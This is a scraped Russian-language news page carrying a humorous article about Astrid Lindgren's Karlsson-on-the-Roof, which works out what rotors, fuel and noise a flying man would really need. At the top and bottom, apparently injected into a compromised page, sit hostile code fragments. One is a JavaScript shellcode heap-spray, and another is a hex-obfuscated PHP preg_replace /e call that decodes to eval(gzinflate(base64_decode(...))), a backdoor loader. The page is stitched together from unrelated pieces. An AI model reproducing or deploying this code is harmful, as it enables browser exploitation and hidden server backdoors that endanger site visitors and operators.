%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); 60 лет над крышами Стокгольма
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

60 лет над крышами Стокгольма

60 лет над крышами Стокгольма
60 лет над крышами Стокгольма

Рисунок Оксаны Александриди

В 2015 году исполнилось 60 лет самому известному шведскому «мужчине в полном расцвете сил» по имени ( или по фамилии — этого и по сей день доподлинно никто не знает ) Карлсон. Мир узнал о том, что на крыше в центре Стокгольма проживает чемпион по поеданию варенья, время от времени, переодевающийся привидением, после выхода в 1955 году новой книги Астрид Линдгрен «Малыш и Карлсон, который живёт на крыше» ( Lillebror och Karlsson pa taket).


Описанный шведской писательницей господин отличался одной весьма примечательной способностью: он мог перемещаться по воздуху почти самостоятельно, не пользуясь летательными аппаратами, при помощи трёх- или четырёхлопастного винта на спине. Автор не сообщает лётно-технических характеристик своего персонажа. Попробуем представить, как должен быть оснащен с точки зрения теории авиации «мужчина в самом расцвете сил», чтобы перемещаться по воздуху .

Сказочный Карлсон — типичный вертолет.

Несущий винт на спине создает вращающий момент противоположного направления. То есть, наш герой в полете должен вертеться словно волчок – это если предположить, что у него сзади один пропеллер, вроде вентилятора. При таком конструкторском решении далеко не улетишь, поэтому, предположим, что Карлсон — вертолет классической схемы. В этом случае, ему потребуется перпендикулярный винт на ноге или голове для стабилизации полёта. Если его расположить на затылке, то Карлсон будет похож на панка с прической «ирокез». Зато в полёте головной пропеллер предотвратит неконтролируемое вращение. Однако, при таком техническом решении, любитель варенья на сможет перевозить на плечах Малыша (настоящее имя Сванте Свантессон) семи лет от роду и его таксу по кличке Бимбо. Вероятность того, что они попадут под лопасти головного винта крайне высока. Поэтому лучше расположить стабилизирующий пропеллер в районе нижних конечностей Карлсона.

Возможна другая схема — соосная.

В этом случае, на спине у Карлсона должны быть два винта, насаженных на одну ось. Они вращаются в противоположных направлениях и компенсируют вращательный момент друг друга. Места на плечах Карлсона станет заметно больше. Однако, ему стоит воздержаться от быстрых наборов высоты. В случае резкого подъема, Карлсону грозит схлёстывание винтов и неминуемая катастрофа.

60 лет над крышами Стокгольма

60 лет над крышами Стокгольма

60 лет над крышами Стокгольма

60 лет над крышами Стокгольма

60 лет над крышами Стокгольма

Винты необходимо насадить на длинную ось.

Расстояние между лопастями и спиной должно составлять не менее одного метра. В противном случае, первый же полёт на спине Карлсона станет для Малыша и последним. Какой длины должны быть лопасти? Для сравнения возьмём существующий пока только в проекте одноместный ранцевый вертолет «ЮЛА», представленный российскими разработчиками в 1998 году на выставке в Омске. Несущий винт устройства диаметром шесть метров поднимает 170 килограммов (сам аппарат и груз). Предположим, что Карлсон мужчина среднего телосложения и весит 70 килограммов. При диаметре пропеллера в 3-4 метра он сможет взлететь сам и прихватить с собой Малыша, его собаку и запас варенья. Но мало подняться в небо.

Приземление - не менее важная часть полёта.

А с ним-то как раз могут возникнуть проблемы, особенно, если попытаться «сесть» на подоконник. Трёх-четырёхметровый винт не поместится в оконный проем. Решение есть – механизм складывания лопастей.

Другой вопрос, как, сложив пропеллер ДО посадки, успеть высадить Малыша, собаку, разгрузить варенье и уцепиться за подоконник самому. В полёте лучше тоже не зевать.

В средневековом центре Стокгольма много старинных узких улочек. Человек-вертолет рискует зацепиться лопастями за стены, балконы, цветочные ящики, не говоря уж про многочисленные провода и антенны. Флюгеры, дымоходы и вывески тоже не способствуют безопасности полётов. Хорошо хоть жители шведской столицы, в отличие от южан, не натягивают верёвки для сушки белья поперёк улиц! Зато в последние годы взяли моду устанавливать на крышах пчелиные ульи.

Карлсон нарушил все требования авиационной безопасности, когда отправился с Малышом в ночную экскурсию без навигатора и автопилота. Более того, он не включил ни бортовые огни на себе, ни посадочные - на своей крыше. Впрочем, чего ещё ждать, от отрицательного персонажа?!

Ибо с точки зрения шведов, Карлсон – персонаж, однозначно отрицательный, постоянно подрывающий устои, нарушающий общепринятые нормы и втягивающий положительного Малыша в сомнительные проделки.

Теперь, несколько слов о топливе.

Как известно, двигатель Карлсона работает на варенье, предположительно, на малиновом. Его калорийность составляет 2730 ккал на килограмм. Удельная теплота сгорания бензина — 11 250 ккал / кг. Ранцевый вертолет «ЮЛА» сжигает 25 килограммов бензина на 30 мин полета, то есть 11 250 х 25 = 281 250 ккал. Для получения такого же количества энергии потребуется 103 килограмма варенья.

Сделаем поправку на меньший вес авиатора и его пассажиров. Расчеты показывают, что на тридцать минут полёта потребуется примерно шестьдесят килограмм варенья. При этом силовая установка должна быть очень компактной и лёгкой. Возьмём за образец роторно-поршневой двигатель. Такой, как у родстера MAZDA RX-8, например. Итак, двигатель готов, пропеллер смазан, топливный бак залит вареньем.

Куда Малыш и Карлсон смогу полететь ?

Семья Свенссон живет в центре шведской столицы, в многоэтажке, расположенной в районе Вазастан. За трубой на крыше того же дома примостился «пентхауз» Карлсона. Бытует мнение, что их общий адрес - Упплансгатан, 1 (Upplandsgatan,1). Пусть Карлсон обладает такой же скоростью, что и прототип индивидуального вертолета «Юла»: сто двадцать километров в час. Он съел шестьдесят килограммов малинового варенья, после чего не лопнул, не поправился, а невозмутимо усадил Малыша на плечи и отправился в полёт. За тридцать минут они пролетят шестьдесят километров.

Друзья, конечно, помнят о том, что им надо еще вернуться домой, поэтому они не станут удаляться от Упплансгатан дальше, чем на пятнадцать минут лета, то есть километров на тридцать. Даже с учётом всех перечисленных ограничений, Карлсон с Малышом «на борту» сможет долететь до любой точки Стокгольма и даже до многих пригородов шведской столицы. Куда бы ни направлялся Карслон, в одном можно быть уверенным – несмотря на все усилия и его самого и семейства Свенссон, сохранить информацию о человеке-вертолёте в тайне совершенно точно не удастся.

Поднявшись в воздух, да еще гружёным, да еще ночью, «лучший в мире поедатель пирогов» разбудит половину Стокгольма.

Уровень шума легкого вертолета составляет 120-140 децибел. «Маленькое привидение с мотором» звучит громче мощной акустической системы. Более того, из-за шума во время полёта Малыш и Карлсон не смогут общаться. Для того, чтобы вести беседу им потребуются переговорные устройства, снабжённые наушниками и микрофоном. В добавок, от создаваемых мотором низкочастотных вибраций будут дрожать стены домов и дребезжать окна, а самим героям довольно скоро потребуется квалифицированная медицинская помощь для борьбы с вибрационной болезнью.

В общем, если подойти к вопросу с научно-технической, а не со сказочной точки зрения, многорежимному прототипу вертолёта-амфибии «Карлсон» безопаснее и надежнее со всех точек зрения ходить по Стокгольму пешком и водить своего друга Малыша за руку.

Текст: Сергей Толмачев

Источник: ScandiNews
Просмотров: 139
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/